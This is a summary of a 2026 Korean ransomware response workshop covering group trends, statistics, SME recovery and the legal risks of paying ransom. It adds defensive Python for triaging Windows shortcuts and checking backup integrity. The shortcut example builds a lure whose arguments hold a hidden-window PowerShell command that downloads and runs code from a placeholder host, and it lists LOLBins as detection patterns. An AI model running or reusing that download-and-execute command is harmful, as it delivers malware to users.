Summary of "2026 제4회 랜섬웨어대응연구회 워크숍" (2026 4th Ransomware Response Research Society Workshop)
1) Workshop Purpose and Framing
- The opening and early remarks define ransomware as an evolving societal threat, not merely a financial or IT incident.
- A core emphasis is that effective response requires:
  - Practical response capabilities
  - Continuous information sharing across government, academia and industry
  - Preparation for both investigation and recovery
2) Ransomware Threat Trends, Group Behavior, and “What to Watch”
A first session focused on ransomware group trends and damage cases, highlighting:
- The threat landscape changes rapidly, with AI-assisted tooling and fast-mutating tactics appearing frequently.
- Ransomware crews are increasingly operating through data theft and extortion ecosystems, not only encrypting files “for money.”
A notable discussion covered the ransomware group Qilin (the transcript renders the name as "Gilin", "Guilin" and "Killin"):
- The group's model: steal victim data, threaten to publish it, and use encryption as one lever within a broader profit model.
- Defender guidance: track where the group moves, how it operates, and which targets come next, rather than fixating on the ransomware brand name.
3) Cybercrime Statistics: “Damage May Appear to Drop, but Ransomware Incidence Keeps Rising”
A major analytical point challenged the idea that ransomware is truly decreasing:
- Some datasets show a downward trend in reported losses (U.S. reporting was cited as one such context).
- The number of incidents, especially when measured globally, has not clearly declined and may still be rising.
- The session criticized reading "less damage in one metric" as "less ransomware overall": reporting is incomplete, and different sources count different things (reported losses vs. incident counts).
4) How Ransomware Profit is Structured: From Encryption to “Service + Ecosystem”
The talks stress that modern ransomware often works like a service ecosystem, involving:
- Initial access actors
- Affiliate/distribution groups
- Data exfiltration stages
- Extortion/negotiation components
- “Repackaging” into ransomware
The underlying objective is framed as data extraction and monetization, where encryption functions mainly as a coercion mechanism rather than the sole profit engine.
5) Malware Delivery and Common Infection Patterns (Practical DFIR Concerns)
A practical section described a typical infection chain:
- Initial entry via phishing/social engineering or exploited vulnerabilities
- Malware execution leading to data theft
- Eventual ransomware deployment
The session also warned about:
- Malicious files disguised as legitimate documents, shortcuts or links, including the long-running Windows shortcut (LNK) delivery technique
- The key operational takeaway: a file's extension, icon and displayed name are attacker-controlled and therefore unreliable, so defenders should treat them as low-trust indicators and inspect what the file actually executes.
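As an added illustration of that takeaway (this is example code written for this summary, not material from the workshop or any presenter), the script below reads a Windows shortcut by its binary structure (MS-SHLLINK: header, optional IDList and LinkInfo, then the StringData fields) and judges it by what it launches rather than by its name or icon. The two shortcuts it inspects are constructed in the block itself: a lure named like a PDF whose real target is `powershell.exe` with a hidden-window download command, and an ordinary shortcut to a document. The interpreter list, document-extension list and argument markers are assumptions chosen for the example, not a vetted detection ruleset, and the URL `example.invalid` is a placeholder.

```python
import struct
from typing import Optional

# Shell Link header constants (MS-SHLLINK 2.1).
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits (MS-SHLLINK 2.1.1) that decide which optional structures follow the header.
HAS_LINK_TARGET_ID_LIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7

# StringData fields appear in this fixed order, each present only if its flag is set.
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

# Assumed triage lists for this example (not a vetted ruleset).
INTERPRETERS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript",
                "rundll32", "regsvr32", "certutil", "bitsadmin")
DOC_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".hwp", ".txt", ".jpg", ".png")
SUSPICIOUS_ARGS = ("-enc", "-encodedcommand", "-w hidden", "-windowstyle hidden",
                   "http://", "https://", "downloadstring", "iex", "invoke-expression")


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields (target path, arguments, icon, ...) of a .lnk file."""
    if len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE:
        raise ValueError("not a Shell Link: bad HeaderSize")
    if data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:      # skip IDList: uint16 size followed by that many bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                # skip LinkInfo: its first uint32 is its total size
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for bit, key in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, not bytes
        pos += 2
        nbytes = count * 2 if unicode else count
        raw = data[pos:pos + nbytes]
        pos += nbytes
        fields[key] = raw.decode("utf-16-le") if unicode else raw.decode("cp1252")
    return fields


def build_lnk(relative_path: str, arguments: str, icon_location: Optional[str] = None) -> bytes:
    """Build a minimal Unicode .lnk (header, empty IDList, StringData). Constructed fixture only."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    if icon_location is not None:
        flags |= HAS_ICON_LOCATION
    # HeaderSize, CLSID, LinkFlags, FileAttributes, 3 timestamps, FileSize, IconIndex,
    # ShowCommand (SW_SHOWNORMAL=1), HotKey, Reserved1..3
    header = struct.pack("<I16sIIQQQIiIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    id_list = struct.pack("<H", 2) + b"\x00\x00"   # IDListSize=2: only the TerminalID

    def string_data(text: str) -> bytes:
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    body = string_data(relative_path) + string_data(arguments)
    if icon_location is not None:
        body += string_data(icon_location)
    return header + id_list + body


def triage_lnk(filename: str, data: bytes) -> dict:
    """Judge a shortcut by what it launches, not by its displayed name or icon."""
    fields = parse_lnk(data)
    target = (fields.get("relative_path", "") + " " + fields.get("arguments", "")).lower()
    name = filename.lower()
    stem = name[:-4] if name.endswith(".lnk") else name
    reasons = []
    if any(stem.endswith(ext) for ext in DOC_EXTENSIONS):
        reasons.append("double extension: document-looking name on a shortcut")
    launches_interpreter = any(tool in target for tool in INTERPRETERS)
    if launches_interpreter:
        reasons.append("target runs a script interpreter or LOLBin")
        icon = fields.get("icon_location", "")
        if icon and not any(tool in icon.lower() for tool in INTERPRETERS):
            reasons.append(f"icon borrowed from unrelated file: {icon}")
    hits = [marker for marker in SUSPICIOUS_ARGS if marker in target]
    if hits:
        reasons.append("arguments contain: " + ", ".join(hits))
    if launches_interpreter and len(reasons) >= 2:
        verdict = "suspicious"
    elif reasons:
        verdict = "review"
    else:
        verdict = "benign-looking"
    return {"file": filename, "verdict": verdict, "reasons": reasons, "fields": fields}


# Constructed samples (not real captures).
LURE_NAME = "Invoice_2026-03.pdf.lnk"
LURE = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')\"",
    icon_location=r"%SystemRoot%\System32\imageres.dll",
)
PLAIN_NAME = "quarterly_report.lnk"
PLAIN = build_lnk(r"..\Documents\quarterly_report.docx", "")

if __name__ == "__main__":
    for shortcut_name, blob in ((LURE_NAME, LURE), (PLAIN_NAME, PLAIN)):
        result = triage_lnk(shortcut_name, blob)
        print(f"{shortcut_name}: {result['verdict']}")
        for reason in result["reasons"]:
            print("  -", reason)
```

The parser deliberately ignores the icon and the file name when deciding what the shortcut does; both are attacker-controlled. On a real host, `parse_lnk` would be fed the bytes of each `.lnk` found in mail attachments, download folders or extracted archives, and anything with verdict `suspicious` goes to the DFIR queue with its decoded arguments attached.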
6) “Response on the Right Track”: Legal Systems, Recovery Tooling, and Defense-to-Recovery Shift
A presenter argued that major countries are building ransomware-related legal and reporting frameworks, including:
- Reporting time windows and penalties (examples cited: the U.S., Australia, the EU, Japan, Singapore, and Korea's personal-information breach reporting requirements)
Global law enforcement initiatives have disrupted some operations and supported recovery tooling, but:
- SMEs remain highly vulnerable because of limited security staffing, slower detection and fewer resources.
Strategic proposal:
- Shift from a defense-only mindset to recovery-centered design, including:
  - Immutable or air-gapped backups
  - Integrity verification
  - Segmentation
  - MFA/passkeys
  - Incident response (IR) playbooks
7) SME Vulnerability: Detection Delay, Backup Reinfection Risk, and Operational Reality
The SME-focused section argued:
- Large firms can detect/respond quickly (days), while SMEs may take months.
- Reinfection risk persists even after recovery because:
  - Backups may have been compromised or infected during the attacker's dwell time and staging, so restoring from them can restore the attacker's foothold as well.
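The "integrity verification" item in the recovery-centered design above, and the backup reinfection risk just described, both come down to one check: before restoring, prove that the backup set is the one you took and that nothing was altered or added while the attacker had access. The block below is an added example written for this summary, not code from the workshop or from any presenter. It hashes every file in a backup tree into a manifest, protects the manifest with an HMAC under a key that is assumed to be held off the backup host (the key bytes here are a constructed placeholder), and on verification reports modified, missing and unexpected files; the sample backup and the tampering are constructed inside `demo()` in a temporary directory.

```python
import hashlib
import hmac
import json
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    """Stream a file through SHA-256 so large backup images do not have to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> dict:
    """Relative path -> SHA-256 for every regular file under the backup root."""
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def _canonical(manifest: dict) -> bytes:
    # Deterministic encoding, so signer and verifier MAC exactly the same bytes.
    return json.dumps(manifest, sort_keys=True, separators=(",", ":")).encode()


def sign_manifest(manifest: dict, key: bytes) -> bytes:
    """Attach an HMAC so the manifest cannot be rewritten to match tampered files."""
    tag = hmac.new(key, _canonical(manifest), hashlib.sha256).hexdigest()
    return json.dumps({"manifest": manifest, "hmac": tag}, sort_keys=True).encode()


def verify_backup(root: Path, signed: bytes, key: bytes) -> list:
    """Return findings; an empty list means every file matches the signed manifest."""
    try:
        doc = json.loads(signed)
        manifest, tag = doc["manifest"], doc["hmac"]
    except (ValueError, KeyError, TypeError):
        return ["manifest unreadable"]
    expected = hmac.new(key, _canonical(manifest), hashlib.sha256).hexdigest()
    if not isinstance(tag, str) or not hmac.compare_digest(expected, tag):
        # Without a valid MAC none of the hashes can be trusted, so stop here.
        return ["manifest signature invalid: do not trust any hash in it"]
    current = build_manifest(root)
    findings = [f"missing: {rel}" for rel in manifest if rel not in current]
    findings += [f"modified: {rel}" for rel, digest in manifest.items()
                 if rel in current and current[rel] != digest]
    findings += [f"unexpected: {rel}" for rel in current if rel not in manifest]
    return findings


def demo() -> dict:
    """Constructed scenario: sign a clean backup, then simulate tampering during attacker dwell time."""
    key = b"offline-key-kept-on-a-separate-host"   # placeholder; a real key never lives on the backup host
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "db").mkdir()
        (root / "db" / "customers.sql").write_bytes(b"INSERT INTO customers VALUES (1, 'a');\n")
        (root / "config.yaml").write_bytes(b"retention_days: 30\n")
        signed = sign_manifest(build_manifest(root), key)
        results["clean"] = verify_backup(root, signed, key)
        # Attacker with write access to the backup share: encrypt a file and stage a loader.
        (root / "db" / "customers.sql").write_bytes(b"\x00encrypted\x00")
        (root / "db" / "loader.exe").write_bytes(b"MZ")
        results["tampered"] = verify_backup(root, signed, key)
        # Attacker also edits the manifest to hide the change; the MAC catches it.
        forged = signed.replace(b'"db/customers.sql"', b'"db/customers.bak"')
        results["forged_manifest"] = verify_backup(root, forged, key)
    return results


if __name__ == "__main__":
    for scenario, findings in demo().items():
        print(f"{scenario}: {findings or 'OK'}")
```

The check only helps if the manifest and its key are not reachable from the host that gets compromised: store the signed manifest with the immutable copy and keep the key on a separate system, or the attacker simply re-signs. An `unexpected:` finding is as important as a `modified:` one, since a file staged into the backup set during dwell time is exactly how reinfection after restore happens.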
A phased mitigation approach was presented as maturity over time:
- Year 1: foundational measures + immutable backups + response manual
- Year 2: automation/segmentation + passkey/MFA strengthening + IR zone design
- Year 3: Zero Trust + governance + storage security maturity
Reported expected outcomes included:
- Improved detection rates
- Faster restoration (e.g., from ~weeks to ~days within the plan)
- Reduced reinfection probability
8) Case Study & Investigation Perspective (DFIR and Law Enforcement)
A DFIR/case presenter explained ransomware operational logic:
- Unlike stealth malware, ransomware is engineered for extortion:
  - Encryption and rapid disruption
  - A data theft and blackmail workflow
A law enforcement/inspector presenter described an investigation case approach:
- Emphasis on:
  - Timely reporting (to preserve investigative value)
  - Evidence trails
  - International cooperation
  - Tracking financial flows (e.g., via virtual assets)
- The speaker noted arrests are often not possible due to insufficient data/reporting and delays, and that stronger cooperation improves odds of takedowns and recovery.
9) Legal Issues: Negotiation, Payments, Sanctions, and Corporate Decision Risk
A legal session addressed the question: “Can we negotiate?” and what payment implies legally.
- Negotiating with the attacker was described as not, in itself, prohibited under domestic (Korean) law.
- Paying, however, can create several distinct legal risks.
Key legal risk categories emphasized:
- Breach of trust / duty of care issues for management if payment is deemed improper
- Accounting/tax treatment complexities of ransom payments and vendor contracting
- Disclosure/reporting obligations when personal information or sensitive data leaks occur
- Anti-terrorism-financing and sanctions compliance risks in state-linked cases (the discussion referenced Lazarus and the resulting exposure to international sanctions)
Advice:
- Treat payment decisions as complex legal/strategic actions requiring expert consultation and internal documentation.
10) Q&A Themes Across Sessions
Recurring concerns included:
- Why some countries (e.g., the U.S.) may not publicly contribute as much as expected despite strong recovery tools
- Technical guidance for investigating intrusion paths when logs are encrypted or evidence is erased
- How to estimate recovery/tool timelines and how AI alters attacker/defender dynamics
- Whether AI benefits defenders operationally or mainly accelerates attacker mutation
Presenters / Contributors (Named)
- Kim Ki-beom (National Security Technology Research Institute; ransomware response research introduction)
- Park Tae-hwan (Guide Bae / ransomware group trends presenter)
- Lee Dong-hyun (Director; session chair / Intelligence Agency National Damage Response Team)
- Lee Jun-young (Playbit Digital Threat Response Center; DFIR/ransomware incident case)
- Kim Ki-hoon (Jiheungwon / Korea Internet & Security Agency team lead; “Are we on the right track?” recovery/legal/strategy)
- Lee Sang-joong (Korea Internet & Security Agency Director; remarks/congratulatory speech in opening)
- Song Joong-seok (Korea Science and Technology / Information Research Institute Director; opening remarks)
- Jung-seong Kim (Kookmin University; chair of the ransomware response research committee; opening address)
- Lee Jung-hyun (Korea Information Society Senior Vice President; welcoming address)
- Kim Hyun-jang (lawyer; legal session co-presenter)
- Park Jong-guk (attorney/lawyer; legal session co-presenter)
- Lee Ji-won / Lee Ji-yong (National Police Agency inspector; ransomware investigation case study)
- Yoo Seung-hwan (Sangmyung University; Q&A contributor)
- Kim Gwang-jo (Professor emeritus; Q&A contributor)
Category
News and Commentary